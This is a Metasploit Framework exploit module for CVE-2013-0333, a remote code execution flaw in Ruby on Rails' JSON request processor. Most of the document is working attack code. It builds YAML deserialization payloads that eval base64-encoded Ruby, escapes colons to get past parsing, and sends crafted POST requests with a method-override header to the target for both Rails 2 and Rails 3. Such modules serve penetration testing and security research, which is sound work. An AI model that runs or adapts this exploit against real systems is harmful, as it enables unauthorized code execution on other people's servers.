Ruby on Rails JSON Processor YAML Deserialization Code Execution
Source: metasploit.com  Author: egypt  Published: 2013-01-30

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStagerTFTP
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution',
      'Description'    => %q{
        This module exploits a remote code execution vulnerability in the
        JSON request processor of the Ruby on Rails application framework.
        This vulnerability allows an attacker to instantiate a remote object,
        which in turn can be used to execute any ruby code remotely in the
        context of the application. This vulnerability is very similar to
        CVE-2013-0156.

        This module has been tested successfully on RoR 3.0.9, 3.0.19, and
        2.3.15.

        The technique used by this module requires the target to be running a
        fairly recent version of Ruby 1.9 (since 2011 or so). Applications
        using Ruby 1.8 may still be exploitable using the init_with() method,
        but this has not been demonstrated.
      },
      'Author'         =>
        [
          'jjarmoc',  # Initial module based on cve-2013-0156, testing help
          'egypt',    # Module
          'lian',     # Identified the RouteSet::NamedRouteCollection vector
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2013-0333'],
        ],
      'Platform'       => 'ruby',
      'Arch'           => ARCH_RUBY,
      'Privileged'     => false,
      'Targets'        => [ ['Automatic', {} ] ],
      'DisclosureDate' => 'Jan 28 2013',
      'DefaultOptions' => { "PrependFork" => true },
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
        OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"])
      ], self.class)
  end

  #
  # Create the YAML document that will be embedded into the JSON
  # (Rails 2.3 class names under ActionController::Routing)
  #
  def build_yaml_rails2
    code = Rex::Text.encode_base64(payload.encoded)
    yaml =
      "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
      "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
      "eval(%[#{code}].unpack(%[m0])[0]);' " +
      ": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n   " +
      ":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n     :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
      ":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
    # Encode every ':' as the JSON unicode escape \u003a so that no literal
    # colon appears in the request body
    yaml.gsub(':', '\u003a')
  end

  #
  # Create the YAML document that will be embedded into the JSON
  # (Rails 3 class names under ActionDispatch::Routing)
  #
  def build_yaml_rails3
    code = Rex::Text.encode_base64(payload.encoded)
    yaml =
      "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
      "'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
      ": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
    # Same colon encoding as build_yaml_rails2
    yaml.gsub(':', '\u003a')
  end

  # Pick the YAML variant for the Rails major version being tried
  def build_request(v)
    case v
    when 2; build_yaml_rails2
    when 3; build_yaml_rails3
    end
  end

  #
  # Send the actual request (one attempt per Rails major version)
  #
  def exploit
    [2, 3].each do |ver|
      print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
      send_request_cgi({
        'uri'     => normalize_uri(target_uri.path),
        'method'  => datastore['HTTP_METHOD'],
        'ctype'   => 'application/json',
        'headers' => { 'X-HTTP-Method-Override' => 'get' },
        'data'    => build_request(ver)
      }, 25)
      handler
    end
  end
end
